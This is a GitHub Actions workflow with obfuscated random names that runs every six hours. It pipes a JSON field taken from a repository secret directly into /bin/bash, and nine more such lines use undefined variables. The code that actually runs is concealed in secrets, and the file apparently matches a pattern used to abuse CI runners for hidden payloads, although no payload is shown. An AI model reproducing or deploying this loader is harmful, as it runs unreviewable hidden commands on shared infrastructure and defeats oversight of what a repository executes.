name: zhenbeiwang4896

on:
  workflow_dispatch:
  schedule:
    - cron: '38 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhenbeiwang4896
        env:
          g95: ${{ secrets.g95 }}
        run: |
          echo $g95 | jq -r .vreyx4087 | /bin/bash
          echo $pe36 | jq -r .jb4295 | /bin/bash
          echo $qg483 | jq -r .luknx9 | /bin/bash
          echo $z0 | jq -r .tqrs3511 | /bin/bash
          echo $x58682 | jq -r .r6 | /bin/bash
          echo $rma1 | jq -r .ux0 | /bin/bash
          echo $m2574 | jq -r .ckugc0 | /bin/bash
          echo $m73 | jq -r .j83086 | /bin/bash
          echo $qnd60 | jq -r .zqa97 | /bin/bash
          echo $woex51542 | jq -r .ugry9 | /bin/bash

